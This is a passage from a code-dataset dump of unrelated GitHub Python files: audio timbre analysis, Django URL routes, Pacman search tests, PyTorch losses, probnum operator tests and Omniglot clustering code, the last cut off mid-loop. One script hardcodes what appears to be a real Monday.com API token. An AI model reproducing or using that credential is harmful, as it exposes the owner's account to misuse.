n_components=n_components).flatten()\n tab_red.append(strf_reduced / np.max(strf_reduced))\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrogram' or rs_type == 'mps':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i].flatten())\n tab_red = np.transpose(np.asarray(tab_red))\n elif rs_type == 'spectrum':\n for i in range(len(aud_repres)):\n tab_red.append(aud_repres[i])\n # 128 x nb sounds (time or freq?)\n tab_red = np.transpose(np.asarray(tab_red))\n input_data = tab_red / np.mean(np.std(tab_red, axis=0))\n\n # plt.plot(input_data)\n # plt.show()\n ndims, ninstrus = input_data.shape[0], input_data.shape[1]\n no_samples = ninstrus * (ninstrus - 1) / 2\n idx_triu = np.triu_indices(target_data.shape[0], k=1)\n target_v = target_data[idx_triu]\n mean_target = np.mean(target_v)\n std_target = np.std(target_v)\n kernel = np.zeros((ninstrus, ninstrus))\n for i in range(ninstrus):\n for j in range(i + 1, ninstrus):\n kernel[i, j] = np.sum(\n np.power(input_data[:, i] - input_data[:, j], 2))\n kernel_v = kernel[idx_triu]\n mean_kernel = np.mean(kernel_v)\n std_kernel = np.std(kernel_v)\n Jn = np.sum(\n np.multiply(kernel_v - mean_kernel, target_v - mean_target))\n Jd = (no_samples - 1) * std_target * std_kernel\n corr_results[tsp][rs] = Jn / Jd\n print(' {} : {}'.format(rs, Jn / Jd))\n pickle.dump(corr_results, open('correlations_results.pkl', 'wb'))\n\n\nif __name__ == '__main__':\n # resume_all()\n # run_all()\n # nonopt_correlations()\n # run_optimization()\n # resume_all()\n grid_search_lr()\n","repo_name":"happyhousehold/timbreStudies","sub_path":"python/script_analyse_folder_strf.py","file_name":"script_analyse_folder_strf.py","file_ext":"py","file_size_in_byte":9494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69965475937","text":"\"\"\"Django_EventManager_WebApp URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.urls import path\r\nfrom labour_management_system import views\r\n\r\nurlpatterns = [\r\n path('', views.home, name='home'),\r\n path('home', views.home, name='home'),\r\n path('district', views.district, name='district'),\r\n path('person', views.person, name='person'),\r\n path('supervisor', views.supervisor, name='supervisor'),\r\n path('perform', views.perform, name='perform'),\r\n path('showDistrict', views.showDistrict, name='showDistrict'),\r\n path('showPerson', views.showPerson, name='showPerson'),\r\n path('showSupervisor', views.showSupervisor, name='showSupervisor'),\r\n path('editDistrict', views.editDistrict, name='editDistrict'),\r\n path('editPerson', views.editPerson, name='editPerson'),\r\n path('editSupervisor', views.editSupervisor, name='editSupervisor'),\r\n path('deleteDistrict', views.deleteDistrict, name='deleteDistrict'),\r\n path('deletePerson', views.deletePerson, name='deletePerson'),\r\n path('deleteSupervisor', views.deleteSupervisor, name='deleteSupervisor'),\r\n]\r\n","repo_name":"harshpatel2212/Labour-Management-System","sub_path":"labour_management_system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34684352384","text":"import os, time, sys, shutil\r\ndir_common = 'D:/code/python/common/'\r\nif not dir_common in sys.path:\r\n sys.path.append(dir_common)\r\nimport numpy as np\r\n \r\nimport MyHelper as mh\r\nimport perf_eval_helper as peh\r\n\r\n\r\n#==============================================================================\r\n\r\n\r\n# inputs \r\nfn_lis_ann = 'D:/projects/025_candidate_detection/lis/lis_ann_all_tr.txt'\r\ndir_det = 'D:/projects/023_dev_test/PFAI_30_Dev_Train/hologic/'\r\n\r\n#fn_lis_ann = 'D:/projects/025_candidate_detection/lis/lis_ann_all_ts.txt'\r\n#dir_det = 'D:/projects/023_dev_test/PFAI_30_Dev_Test/output_v2.1/hologic/'\r\n\r\n# outputs:\r\n\r\ndir_det_tgt = 'D:/projects/025_candidate_detection/data/det/hologic/'\r\n\r\n\r\ndir_det = dir_det_tgt\r\n\r\n\r\nfn_log = (os.path.basename(__file__)).replace('.py', '.log.txt')\r\n\r\n#==============================================================================\r\n# NO NEED TO CHANGE BELOW THIS LINE\r\n#==============================================================================\r\ntime_start = time.time()\r\n\r\nlis_ann = mh.ReadLisFile(fn_lis_ann)\r\nn_ann = len(lis_ann)\r\n\r\nfor n in range(n_ann):\r\n ann = lis_ann[n]\r\n #print('[%4d/%4d] %s' % (n+1, n_ann, ann))\r\n \r\n tmp = ann[:ann.find('.')].split('_')\r\n case = tmp[0]\r\n view = tmp[3]+'_'+tmp[4]\r\n \r\n dir_case = dir_det + case + '/'\r\n if not os.path.exists(dir_case):\r\n mh.print_log_msg(fn_log, 'case %s had no detections in %s' % (case, dir_det))\r\n continue\r\n \r\n dir_case_tgt = dir_det_tgt + case + '/'\r\n mh.mkdir(dir_case_tgt)\r\n \r\n fn_ydet = dir_case + '%s.%s.ydetects' % (case, view)\r\n if not os.path.exists(fn_ydet):\r\n mh.print_log_msg(fn_log, 'case %s view %s had no ydetects in %s' % (case, view, dir_det))\r\n continue\r\n \r\n if dir_det_tgt != dir_det:\r\n shutil.copy2(fn_ydet, dir_case_tgt) \r\n #break\r\n\r\nmh.print_log_msg(fn_log, 'run time = %.2f sec' % (time.time() - time_start))\r\n","repo_name":"jge502/hello-world","sub_path":"s004_get_cancer_ydetects.py","file_name":"s004_get_cancer_ydetects.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12626817756","text":"from problems import SingleFoodSearchProblem, MultiFoodSearchProblem, EightQueenProblem\nfrom searchAgents import bfs, dfs, ucs, astar, gbfs, Euclidean_heuristic, Manhattan_heuristic\n\n\ndef cau1_2():\n while True:\n try:\n number = int(input(\"Testcase:\\n1.Single01\\t2.Single02\\t3.Single03\\t4.Multi01\\t5.Multi02\\t6.Multi03\\n\"))\n if number == 1:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single01.txt\")\n algorithm1_2(problem)\n elif number == 2:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single02.txt\")\n algorithm1_2(problem)\n elif number == 3:\n problem = SingleFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_single03.txt\")\n algorithm1_2(problem)\n elif number == 4:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi01.txt\")\n algorithm1_2(problem)\n elif number == 5:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi02.txt\")\n algorithm1_2(problem)\n elif number == 6:\n problem = MultiFoodSearchProblem()\n problem.load_from_file(\"../sample_inputs/pacman_multi03.txt\")\n algorithm1_2(problem)\n else:\n break\n except:\n break\n\n\ndef algorithm1_2(problem: SingleFoodSearchProblem or MultiFoodSearchProblem):\n while True:\n try:\n number = int(input(\"Algorithm:\\n1.BFS\\t2.DFS\\t3.UCS\\t4.AStar\\t5.GBFS\\n\"))\n if number == 1:\n path = bfs(problem)\n print(path)\n elif number == 2:\n path = dfs(problem)\n print(path)\n elif number == 3:\n path = ucs(problem)\n print(path)\n elif number == 4:\n heuristic = choose_heuristic()\n if heuristic == 1:\n path = astar(problem, Euclidean_heuristic)\n print(path)\n elif heuristic == 2:\n path = astar(problem, Manhattan_heuristic)\n print(path)\n elif number == 5:\n heuristic = choose_heuristic()\n if heuristic == 1:\n path = gbfs(problem, Euclidean_heuristic)\n print(path)\n elif heuristic == 2:\n path = gbfs(problem, Manhattan_heuristic)\n print(path)\n else:\n break\n except:\n break\n\n\ndef choose_heuristic():\n while True:\n number = int(input(\"Heuristic:\\n1.Euclidean\\t2.Manhattan\\n\"))\n if number == 1 or number == 2:\n return number\n\n\ndef cau3():\n while True:\n try:\n number = int(input(\"Testcase:\\n1.Queen01\\t2.Queen02\\t3.Queen03\\n\"))\n if number == 1:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens01.txt\")\n algorithm3(problem)\n elif number == 2:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens02.txt\")\n algorithm3(problem)\n elif number == 3:\n problem = EightQueenProblem()\n problem.load_from_file(\"../sample_inputs/eight_queens03.txt\")\n algorithm3(problem)\n else:\n break\n except:\n break\n\ndef algorithm3(problem):\n problem.print()\n problem.__newinit__()\n print(problem.h([0, 7]))\n problem.print_board()\n\n\n\n#cau1_2()\n#cau3()\n","repo_name":"maihathm/AI-MidTerm","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11628800852","text":"def fibonacci(limit): #enter a number that is half of the desired range\n a = 1 #first terms of the fibonacci sequence\n b = 1\n\n for i in range(1, limit+1): #range isn't inclusive on upper limit\n a+=b\n b+=a #modelling the fibonacci sequence\n print(a)\n print(b)\n\nfibonacci(5) #testing the code with a range of 10 numbers\n","repo_name":"TomPettit7/Project-Euler","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43600833509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 21 10:14:38 2023\n\n@author: hcliffo\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom monday import MondayClient\n\ndef extract_visualizations():\n \n monday = MondayClient('eyJhbGciOiJIUzI1NiJ9.eyJ0aWQiOjIwMjg0NzE0NSwidWlkIjozMDk0NDE5OCwiaWFkIjoiMjAyMi0xMi0wMVQwNzoxODoxOS43ODBaIiwicGVyIjoibWU6d3JpdGUiLCJhY3RpZCI6MTIyMTY1NDMsInJnbiI6InVzZTEifQ.Xk83t2dR3L01D679_WxfsVixFeXJJiCTKbRxY2dIIk0')\n cols = monday.boards.fetch_columns_by_board_id([3272211806])\n columns = [i['title'] for i in cols['data']['boards'][0]['columns']][1:]\n\n items = monday.boards.fetch_items_by_board_id(3272211806)\n ds = {}\n\n for n,i in enumerate(items.get('data').get('boards')[0]['items']):\n\n name = i['name']\n info = pd.DataFrame(items.get('data').get('boards')[0]['items'][n]['column_values'])\n info['value'] = columns\n info = info.set_index('value')\n info = info['text']\n ds[name] = info\n \n ds = pd.concat(ds,axis=1)\n\n ds = ds.T\n ds = ds.reset_index()\n ds = ds.rename(columns = {'index':'Name'})\n ds = ds[['Name','User Resources','User Resources Completed', 'Link','Article Overview','Status']]\n return ds\n\ndf = extract_visualizations()\n\nfor n,row in df.iterrows():\n if row['User Resources']=='Complete Resources':\n viz_link = row['Link']\n viz = row['Name']\n \n page = requests.get(viz_link)\n \n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(\"h2\")\n author = results.prettify()\n viz_author = author.split('\\n ')[3][1:]\n if not viz_author == 'visual':\n print(viz)\n print(viz_author)\n\n\n","repo_name":"visualizingenergy/website_codes","sub_path":"Check_Monday_Authors.py","file_name":"Check_Monday_Authors.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36279837068","text":"'''\nloss function을 정의하는 .py입니다.\n'''\nimport torch\nimport torch.nn as nn\n\nclass buildLosses(object):\n def __init__(self, cuda=True, batch_average=True, ignore_index=255, ):\n self.cuda = cuda\n self.batch_average = batch_average\n self.ignore_index = ignore_index\n\n def build_loss(self, mode='ce'):\n \"\"\"Choices: ['ce' or 'focal']\"\"\"\n if mode == 'ce':\n return self.CrossEntropyLoss\n elif mode == 'focal':\n return self.FocalLoss\n # 1. loss 추가는 이곳에 elif 추가 후 진행할것.\n # 2. 아래에 추가하고 싶은 loss에 대한 함수를 def할것.\n else:\n raise NotImplementedError\n\n def CrossEntropyLoss(self, logit, target):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)\n\n if self.cuda:\n criterion = criterion.cuda()\n\n loss = criterion(logit, target.long())\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n def FocalLoss(self, logit, target, gamma=2, alpha=0.5):\n n, c, h, w = logit.size()\n criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)\n\n if self.cuda:\n criterion = criterion.cuda()\n\n logpt = -criterion(logit, target.long())\n pt = torch.exp(logpt)\n\n if alpha is not None:\n logpt *= alpha\n\n loss = -((1 - pt) ** gamma) * logpt\n\n if self.batch_average:\n loss /= n\n\n return loss\n\n# 이 .py에서 standalone으로 loss function이 잘 작동하는지 확인하기 위한 목적\nif __name__ == \"__main__\":\n loss = buildLosses(cuda=True)\n a = torch.rand(1, 3, 7, 7).cuda()\n b = torch.rand(1, 7, 7).cuda()\n print(loss.CrossEntropyLoss(a, b).item())\n print(loss.FocalLoss(a, b, gamma=0, alpha=None).item())\n print(loss.FocalLoss(a, b, gamma=2, alpha=0.5).item())\n\n\n\n\n","repo_name":"brstar96/KHD_Paten","sub_path":"utils/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"38683887419","text":"\"\"\"Tests for linear operator arithmetics.\"\"\"\n# pylint: disable=consider-iterating-dictionary\n\nimport itertools\n\nimport numpy as np\nimport pytest\n\nfrom probnum import config\nfrom probnum.linops._arithmetic import _add_fns, _matmul_fns, _mul_fns, _sub_fns\nfrom probnum.linops._arithmetic_fallbacks import (\n NegatedLinearOperator,\n ProductLinearOperator,\n ScaledLinearOperator,\n SumLinearOperator,\n)\nfrom probnum.linops._kronecker import (\n IdentityKronecker,\n Kronecker,\n SymmetricKronecker,\n Symmetrize,\n)\nfrom probnum.linops._linear_operator import (\n Embedding,\n Identity,\n Matrix,\n Selection,\n TransposedLinearOperator,\n _InverseLinearOperator,\n _TypeCastLinearOperator,\n)\nfrom probnum.linops._scaling import Scaling, Zero\nfrom probnum.problems.zoo.linalg import random_spd_matrix\n\n\ndef _aslist(arg):\n \"\"\"Converts anything to a list. Non-iterables become single-element lists.\"\"\"\n try:\n return list(arg)\n except TypeError: # excepts TypeError: '' object is not iterable\n return [arg]\n\n\ndef get_linop(linop_type):\n # pylint: disable=too-many-return-statements,too-complex,too-many-branches\n if linop_type is Kronecker:\n _A1 = np.ones((2, 2))\n _B1 = np.ones((2, 3))\n return (\n Kronecker(_A1, np.random.rand(2, 2)),\n Kronecker(np.random.rand(4, 3), _B1),\n Kronecker(_A1, np.random.rand(2, 2)),\n Kronecker(np.random.rand(2, 2), _B1),\n )\n elif linop_type is IdentityKronecker:\n return (\n IdentityKronecker(2, np.random.rand(2, 2)),\n IdentityKronecker(3, np.random.rand(3, 4)),\n )\n elif linop_type is Zero or linop_type is Identity:\n return (linop_type(shape=(4, 4)), linop_type(shape=(3, 3)))\n elif linop_type is Scaling:\n return (\n Scaling(factors=np.random.rand(4)),\n Scaling(factors=3.14, shape=(4, 4)),\n Scaling(factors=np.random.rand(6), shape=(6, 6)),\n Scaling(factors=3.14, shape=(3, 3)),\n )\n elif linop_type is Matrix:\n return (Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(6, 3)))\n elif linop_type is _InverseLinearOperator:\n _posdef_randmat = random_spd_matrix(rng=np.random.default_rng(123), dim=4)\n return Matrix(_posdef_randmat).inv()\n elif linop_type is TransposedLinearOperator:\n return TransposedLinearOperator(linop=Matrix(np.random.rand(4, 4)))\n elif linop_type is Embedding:\n return Embedding(take_indices=(0, 1, 2), put_indices=(1, 0, 3), shape=(4, 3))\n elif linop_type is Selection:\n return Selection(indices=(1, 0, 3), shape=(3, 4))\n elif linop_type is NegatedLinearOperator:\n return NegatedLinearOperator(linop=Matrix(np.random.rand(4, 4)))\n elif linop_type is ScaledLinearOperator:\n return ScaledLinearOperator(linop=Matrix(np.random.rand(4, 4)), scalar=3.14)\n elif linop_type is ProductLinearOperator:\n return ProductLinearOperator(\n Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(4, 4))\n )\n elif linop_type is SumLinearOperator:\n return SumLinearOperator(\n Matrix(np.random.rand(4, 4)), Matrix(np.random.rand(4, 4))\n )\n elif linop_type is SymmetricKronecker:\n return SymmetricKronecker(Identity(2), Identity(2))\n elif linop_type is Symmetrize:\n return Symmetrize(2)\n elif linop_type is _TypeCastLinearOperator:\n return _TypeCastLinearOperator(\n linop=Matrix(np.random.rand(4, 4)), dtype=np.float32\n )\n elif linop_type is np.number:\n return 1.3579\n else:\n raise TypeError(f\"Don't know what to do with type {linop_type}.\")\n\n\ndef test_matmul():\n\n for (l_type, r_type) in _matmul_fns.keys():\n if (\n l_type is Selection\n or l_type is Embedding\n or r_type is Selection\n or r_type is Embedding\n ):\n # Checked seperatly\n continue\n\n linops1 = get_linop(l_type)\n linops2 = get_linop(r_type)\n\n for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n if linop1.shape[1] != linop2.shape[0]:\n with pytest.raises(ValueError):\n res_linop = linop1 @ linop2\n else:\n res_linop = linop1 @ linop2\n assert res_linop.ndim == 2\n\n if l_type is np.number:\n assert res_linop.shape == linop2.shape\n elif r_type is np.number:\n assert res_linop.shape == linop1.shape\n else:\n assert res_linop.shape[0] == linop1.shape[0]\n assert res_linop.shape[1] == linop2.shape[1]\n\n\ndef test_mul():\n for (l_type, r_type) in _mul_fns.keys():\n if (\n l_type is Selection\n or l_type is Embedding\n or r_type is Selection\n or r_type is Embedding\n ):\n # Checked seperatly\n continue\n\n linops1 = get_linop(l_type)\n linops2 = get_linop(r_type)\n\n for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n if l_type is np.number:\n res_linop = linop1 * linop2\n assert res_linop.shape == linop2.shape\n elif r_type is np.number:\n res_linop = linop1 * linop2\n assert res_linop.shape == linop1.shape\n elif linop1.shape != linop2.shape:\n with pytest.raises(ValueError):\n res_linop = linop1 * linop2\n else:\n res_linop = linop1 * linop2\n assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_add():\n\n for (l_type, r_type) in _add_fns.keys():\n if (\n l_type is Selection\n or l_type is Embedding\n or r_type is Selection\n or r_type is Embedding\n ):\n # Checked seperatly\n continue\n\n linops1 = get_linop(l_type)\n linops2 = get_linop(r_type)\n\n for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n if linop1.shape != linop2.shape:\n with pytest.raises(ValueError):\n res_linop = linop1 + linop2\n else:\n res_linop = linop1 + linop2\n assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_sub():\n\n for (l_type, r_type) in _sub_fns.keys():\n if (\n l_type is Selection\n or l_type is Embedding\n or r_type is Selection\n or r_type is Embedding\n ):\n # Checked seperatly\n continue\n\n linops1 = get_linop(l_type)\n linops2 = get_linop(r_type)\n\n for (linop1, linop2) in itertools.product(_aslist(linops1), _aslist(linops2)):\n\n if linop1.shape != linop2.shape:\n with pytest.raises(ValueError):\n res_linop = linop1 - linop2\n else:\n res_linop = linop1 - linop2\n assert res_linop.shape == linop1.shape == linop2.shape\n\n\ndef test_kronecker_matmul():\n # Checks the case in which the shapes of the Kronecker-structured matrices\n # are valid in itself but the respective Kronecker factors (k1.A @ k2.A and/or\n # k1.B @ k2.B) have invalid shapes for matmul.\n k1 = Kronecker(np.random.rand(4, 2), np.random.rand(2, 3)) # (8, 6)\n k2 = Kronecker(np.random.rand(3, 2), np.random.rand(2, 3)) # (6, 6)\n\n # Even though the shapes fit, and Kronecker @ Kronecker = Kronecker ....\n assert k1.shape[1] == k2.shape[0]\n\n # The result does not have a Kronecker structure\n res = k1 @ k2\n assert not isinstance(res, Kronecker)\n\n\ndef test_idkronecker_matmul():\n # Checks the case in which the shapes of the Kronecker-structured matrices\n # are valid in itself but the respective Kronecker factors (k1.A @ k2.A and/or\n # k1.B @ k2.B) have invalid shapes for matmul.\n k1 = IdentityKronecker(4, np.random.rand(2, 3)) # (8, 12)\n k2 = IdentityKronecker(2, np.random.rand(6, 2)) # (12, 4)\n\n # Even though the shapes fit, and\n # IdentityKronecker @ IdentityKronecker = IdentityKronecker ....\n assert k1.shape[1] == k2.shape[0]\n\n # The result does not have a IdentityKronecker structure\n res = k1 @ k2\n assert not isinstance(res, IdentityKronecker)\n\n\ndef test_selection_embedding():\n sel = get_linop(Selection)\n emb = get_linop(Embedding)\n emb2 = Embedding(\n take_indices=emb._take_indices, put_indices=emb._put_indices, shape=(5, 3)\n )\n\n product1 = sel @ emb\n assert product1.shape[0] == sel.shape[0]\n assert product1.shape[1] == emb.shape[1]\n\n product2 = sel @ emb2\n assert product2.shape[0] == sel.shape[0]\n assert product2.shape[1] == emb2.shape[1]\n\n\ndef test_lazy_matrix_matrix_matmul_option():\n mat1 = get_linop(Matrix)[0]\n mat2 = get_linop(Matrix)[0]\n inv = get_linop(_InverseLinearOperator)\n transposed = get_linop(TransposedLinearOperator)\n\n with config(lazy_matrix_matrix_matmul=True):\n assert isinstance(mat1 @ mat2, ProductLinearOperator)\n assert isinstance(mat1 @ inv, ProductLinearOperator)\n assert isinstance(inv @ mat2, ProductLinearOperator)\n assert isinstance(mat1 @ transposed, ProductLinearOperator)\n assert isinstance(transposed @ mat2, ProductLinearOperator)\n\n with config(lazy_matrix_matrix_matmul=False):\n assert isinstance(mat1 @ mat2, Matrix)\n assert isinstance(mat1 @ inv, Matrix)\n assert isinstance(inv @ mat2, Matrix)\n assert isinstance(mat1 @ transposed, Matrix)\n assert isinstance(transposed @ mat2, Matrix)\n\n\ndef test_equality():\n scalings = get_linop(Scaling)\n int_scaling = Scaling(2, shape=(4, 4))\n for s1, s2 in itertools.product(scalings, _aslist(scalings) + [int_scaling]):\n if (\n s1.shape == s2.shape\n and s1.dtype == s2.dtype\n and np.all(s1.todense() == s2.todense())\n ):\n assert s1 == s2\n\n else:\n assert s1 != s2\n","repo_name":"probabilistic-numerics/probnum","sub_path":"tests/test_linops/test_arithmetics.py","file_name":"test_arithmetics.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"34"} +{"seq_id":"14716955696","text":"from . import views\nfrom django.urls import path\n\n\nurlpatterns=[\n path('',views.home),\n path('home',views.home),\n path('questionbank',views.viewquestions,name='select_questions'),\n path('result',views.Result,name='show_result_page'),\n path('enterquestions',views.enterquestions,name='insert_questions'),\n path('',views.enterquestions,name='update_question'),\n path('delete/',views.deletequestion,name='delete_question')\n\n]","repo_name":"bilalhussain1194/bestfitwork","sub_path":"besfit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9956056504","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score\nfrom sklearn.metrics import adjusted_rand_score as ari_score\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.cluster import KMeans\nfrom utils.faster_mix_k_means_pytorch import K_Means\nfrom utils.util import cluster_acc, Identity, AverageMeter, seed_torch, str2bool\nfrom data.omniglotloader import omniglot_alphabet_func, omniglot_evaluation_alphabets_mapping, omniglot_background_val_alphabets \nfrom models.vgg import VGG\nfrom tqdm import tqdm\nfrom collections import Counter\nimport random\nimport math\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\ndef estimate_k(model, unlabeled_loader, labeled_loaders, args):\n u_num = len(unlabeled_loader.dataset)\n u_targets = np.zeros(u_num) \n u_feats = np.zeros((u_num, 1024))\n print('extracting features for unlabeld data')\n for _, (x, _, label, idx) in enumerate(unlabeled_loader):\n x = x.to(device)\n _, feat = model(x)\n feat = feat.view(x.size(0), -1)\n idx = idx.data.cpu().numpy()\n u_feats[idx, :] = feat.data.cpu().numpy()\n u_targets[idx] = label.data.cpu().numpy()\n cand_k = np.arange(args.max_cand_k)\n #get acc for labeled data with short listed k\n best_ks = np.zeros(len(omniglot_background_val_alphabets))\n print('extracting features for labeld data')\n for alphabetStr in omniglot_background_val_alphabets: \n labeled_loader = labeled_loaders[alphabetStr]\n args.num_val_cls = labeled_loader.num_classes\n\n l_num = len(labeled_loader.dataset)\n l_targets = np.zeros(l_num) \n l_feats = np.zeros((l_num, 1024))\n for _, (x, _, label, idx) in enumerate(labeled_loader):\n x = x.to(device)\n _, feat = model(x)\n feat = feat.view(x.size(0), -1)\n idx = idx.data.cpu().numpy()\n l_feats[idx, :] = feat.data.cpu().numpy()\n l_targets[idx] = label.data.cpu().numpy()\n\n l_classes = set(l_targets) \n num_lt_cls = int(round(len(l_classes)*args.split_ratio))\n lt_classes = set(random.sample(l_classes, num_lt_cls)) \n lv_classes = l_classes - lt_classes\n\n lt_feats = np.empty((0, l_feats.shape[1]))\n lt_targets = np.empty(0)\n for c in lt_classes:\n lt_feats = np.vstack((lt_feats, l_feats[l_targets==c]))\n lt_targets = np.append(lt_targets, l_targets[l_targets==c])\n\n lv_feats = np.empty((0, l_feats.shape[1]))\n lv_targets = np.empty(0)\n for c in lv_classes:\n lv_feats = np.vstack((lv_feats, l_feats[l_targets==c]))\n lv_targets = np.append(lv_targets, l_targets[l_targets==c])\n\n cvi_list = np.zeros(len(cand_k))\n acc_list = np.zeros(len(cand_k))\n cat_pred_list = np.zeros([len(cand_k),u_num+l_num])\n print('estimating K ...')\n for i in range(len(cand_k)):\n cvi_list[i], cat_pred_i = labeled_val_fun(np.concatenate((lv_feats, u_feats)), lt_feats, lt_targets, cand_k[i]+args.num_val_cls)\n cat_pred_list[i, :] = cat_pred_i\n acc_list[i] = cluster_acc(lv_targets, cat_pred_i[len(lt_targets): len(lt_targets)+len(lv_targets)])\n idx_cvi = np.max(np.argwhere(cvi_list==np.max(cvi_list)))\n idx_acc = np.max(np.argwhere(acc_list==np.max(acc_list)))\n\n idx_best = int(math.ceil((idx_cvi+idx_acc)*1.0/2))\n cat_pred = cat_pred_list[idx_best, :]\n cnt_cat = Counter(cat_pred.tolist())\n cnt_l = Counter(cat_pred[:l_num].tolist())\n cnt_ul = Counter(cat_pred[l_num:].tolist())\n bin_cat = [x[1] for x in sorted(cnt_cat.items())]\n bin_l = [x[1] for x in sorted(cnt_l.items())]\n bin_ul = [x[1] for x in sorted(cnt_ul.items())]\n expectation = u_num*1.0 / (cand_k[idx_best]+args.num_val_cls)\n best_k = np.sum(np.array(bin_ul)/np.max(bin_ul).astype(float)>args.min_max_ratio)\n print('current best K {}'.format(best_k))\n i_alpha = omniglot_background_val_alphabets.index(alphabetStr)\n best_ks[i_alpha] = best_k\n best_k = np.ceil(np.mean(best_ks)).astype(np.int32)\n kmeans = KMeans(n_clusters=best_k)\n u_pred = kmeans.fit_predict(u_feats).astype(np.int32) \n acc, nmi, ari = cluster_acc(u_targets, u_pred), nmi_score(u_targets, u_pred), ari_score(u_targets, u_pred)\n print('Final K {}, acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(best_k, acc, nmi, ari))\n return best_k\n\ndef labeled_val_fun(u_feats, l_feats, l_targets, k):\n if device=='cuda':\n torch.cuda.empty_cache()\n l_num=len(l_targets)\n kmeans = K_Means(k, pairwise_batch_size = 200)\n kmeans.fit_mix(torch.from_numpy(u_feats).to(device), torch.from_numpy(l_feats).to(device), torch.from_numpy(l_targets).to(device))\n cat_pred = kmeans.labels_.cpu().numpy() \n u_pred = cat_pred[l_num:]\n silh_score = silhouette_score(u_feats, u_pred)\n del kmeans\n return silh_score, cat_pred \n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description='cluster',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--num_val_cls', default=0, type=int)\n parser.add_argument('--max_cand_k', default=100, type=int)\n parser.add_argument('--num_workers', default=2, type=int)\n parser.add_argument('--split_ratio', type=float, default=0.7)\n parser.add_argument('--min_max_ratio', type=float, default=0.01)\n parser.add_argument('--pretrain_dir', type=str, default='./data/experiments/pretrained/vgg6_omniglot_proto.pth')\n parser.add_argument('--dataset_root', type=str, default='./data/datasets')\n parser.add_argument('--seed', default=1, type=int)\n args = parser.parse_args()\n args.cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n seed_torch(args.seed)\n model = VGG(n_layer='4+2', in_channels=1).to(device)\n model.load_state_dict(torch.load(args.pretrain_dir), strict=False)\n model.last = Identity()\n\n labeled_loaders = {}\n for alphabetStr in omniglot_background_val_alphabets: \n _, labeled_loaders[alphabetStr] = omniglot_alphabet_func(alphabet=alphabetStr, background=True, root=args.dataset_root)(batch_size=args.batch_size, num_workers=args.num_workers)\n\n acc = {}\n nmi = {}\n ari = {}\n gtK = {}\n predK = {}\n for _, alphabetStr in omniglot_evaluation_alphabets_mapping.items():\n _, eval_Dloader = omniglot_alphabet_func(alphabet=alphabetStr, background=False, root=args.dataset_root)(batch_size=args.batch_size, num_workers=args.num_workers)\n gtK[alphabetStr] = eval_Dloader.num_classes\n 